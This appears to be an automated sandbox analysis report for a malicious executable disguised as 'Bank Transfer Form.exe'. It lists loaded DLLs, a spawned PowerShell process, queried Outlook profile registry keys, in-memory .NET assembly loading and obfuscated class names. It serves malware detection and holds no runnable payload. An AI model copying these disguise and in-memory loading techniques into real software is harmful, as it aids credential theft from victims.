Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Bank Transfer Form.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Bank Transfer Form.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Bank Transfer Form.exe

Static file information: File size 1084416 > 1048576

Source: Bank Transfer Form.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x108000

Source: Bank Transfer Form.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Bank Transfer Form.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BxFK.pdbSHA256D source: Bank Transfer Form.exe
Source:	Binary string: BxFK.pdb source: Bank Transfer Form.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Bank Transfer Form.exe, Form4.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs	.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs	.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs	.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bank Transfer Form.exe.3e373f0.2.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bank Transfer Form.exe.7200000.5.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])

Source: Bank Transfer Form.exe

Static PE information: 0xEA9A69F2 [Wed Sep 22 10:03:30 2094 UTC]

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0F274757 push FFFFFF8Bh; iretd	0_2_0F274767
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0F271D6B push eax; retf	0_2_0F271D71
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_01809C30 push esp; retf 0182h	3_2_01809D55
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F39241 push es; ret	3_2_06F39244

Source: Bank Transfer Form.exe

Static PE information: section name: .text entropy: 6.860597540741749

Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, YRJCD4GuTkTB5AFtUh.cs	High entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, FyOPAW54oZ0b7HNW4y.cs	High entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.cs	High entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, OrbTnwVH9840uscwtY.cs	High entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DIv3B497lwTEGfxJNnW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, GK3rb8Xx6FpRmLh2PZ.cs	High entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, sy4xRxkBIgUYZjXBH8.cs	High entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, cNTAxyLngQ4wmnErdU.cs	High entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs	High entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, lg884FPT14t8JDBNJj.cs	High entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, fafNrWNPmosQBQ9Hyh.cs	High entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, W0luOeHPpUUnD0Gi9F.cs	High entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, sIYM2V99T3XKebu3Mfs.cs	High entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, JaYZBb9Noi2bbtHjoAV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, XxS9LU1e3iUikC9Jer.cs	High entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DgcOPfs939iFMF7LnU.cs	High entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.cs	High entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, MA9tcoCn4p8ebb7jyP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, SqAFRrEyHODwOt21AL.cs	High entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, L4apYNiLQeObhStfTf.cs	High entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DikMSDzLh1GP3ebiqj.cs	High entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, GOdDuQpxLDLFynigs0.cs	High entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, YRJCD4GuTkTB5AFtUh.cs	High entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, FyOPAW54oZ0b7HNW4y.cs	High entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.cs	High entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, OrbTnwVH9840uscwtY.cs	High entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DIv3B497lwTEGfxJNnW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, GK3rb8Xx6FpRmLh2PZ.cs	High entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, sy4xRxkBIgUYZjXBH8.cs	High entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, cNTAxyLngQ4wmnErdU.cs	High entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs	High entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, lg884FPT14t8JDBNJj.cs	High entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, fafNrWNPmosQBQ9Hyh.cs	High entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, W0luOeHPpUUnD0Gi9F.cs	High entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, sIYM2V99T3XKebu3Mfs.cs	High entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, JaYZBb9Noi2bbtHjoAV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, XxS9LU1e3iUikC9Jer.cs	High entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DgcOPfs939iFMF7LnU.cs	High entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.cs	High entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, MA9tcoCn4p8ebb7jyP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
